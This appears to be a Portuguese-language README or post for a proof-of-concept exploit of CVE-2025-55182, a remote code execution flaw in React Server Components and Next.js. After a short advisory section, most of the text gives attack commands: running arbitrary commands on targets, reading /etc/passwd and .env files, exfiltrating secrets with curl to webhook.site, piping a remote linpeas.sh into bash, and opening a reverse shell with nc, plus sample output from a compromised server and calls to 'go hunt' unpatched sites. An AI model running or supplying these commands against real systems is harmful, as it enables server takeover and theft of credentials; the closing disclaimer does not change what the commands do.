CVE-2025-55182
✅ Isso significa que atacantes poderiam potencialmente executar código arbitrário do lado do servidor com uma única requisição maliciosa.
⚠️ Sistemas que usam Componentes de Servidor React, incluindo:
❌ Não afetados:
npm auditpnpm audityarn audit⚠️ Isso apenas reduz o risco — NÃO substitui a correção
🚨 Se seu aplicativo usa Componentes de Servidor React e não está corrigido — ele está potencialmente totalmente comprometido agora.
CVE-2025-55182.py (RCE básico)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (shell reverso instantâneo)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Isso é literalmente tudo.
Dois scripts, esses 8 comandos → comprometimento total em qualquer site Next.js não corrigido hoje.
Vá atrás dessas recompensas.
Aqui está exatamente o que você verá em tempo real quando o exploit funcionar (alvo 100% não corrigido, 3 de dezembro de 2025):
1. Quando você executa o script RCE normal (CVE-2025-55182.py)
Você digita:
./CVE-2025-55182.py https://target.com "whoami"
Você vê instantaneamente na sua tela:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ Esse “node” (ou o que o comando retornar) é a saída real do servidor vítima.
Se você executar id, verá as linhas completas de uid/gid, etc.
2. Quando você executa o script de shell reverso (CVE-2025-55182-revshell.py)
Você digita:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Você vê instantaneamente no seu terminal de escuta:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ Shell TTY interativo completo como o usuário node (quase sempre o usuário da aplicação web). Você domina a máquina.
Isso é literalmente tudo.
Se você vir algo do acima → exploit funcionou 100%.
Se você receber apenas HTTP 403/404 ou nada → já corrigido ou bloqueado por WAF.
Vá caçar.
aviso legal
Esta PoC é apenas para testes de segurança autorizados e uso educacional.
Não a execute contra qualquer sistema que você não possua ou para o qual não tenha permissão explícita por escrito para testar.
O uso não autorizado é ilegal e pode resultar em processo criminal.
Use apenas em seu laboratório, programas de bug bounty com escopo claro ou alvos que lhe deram permissão.
Você é 100% responsável por suas ações.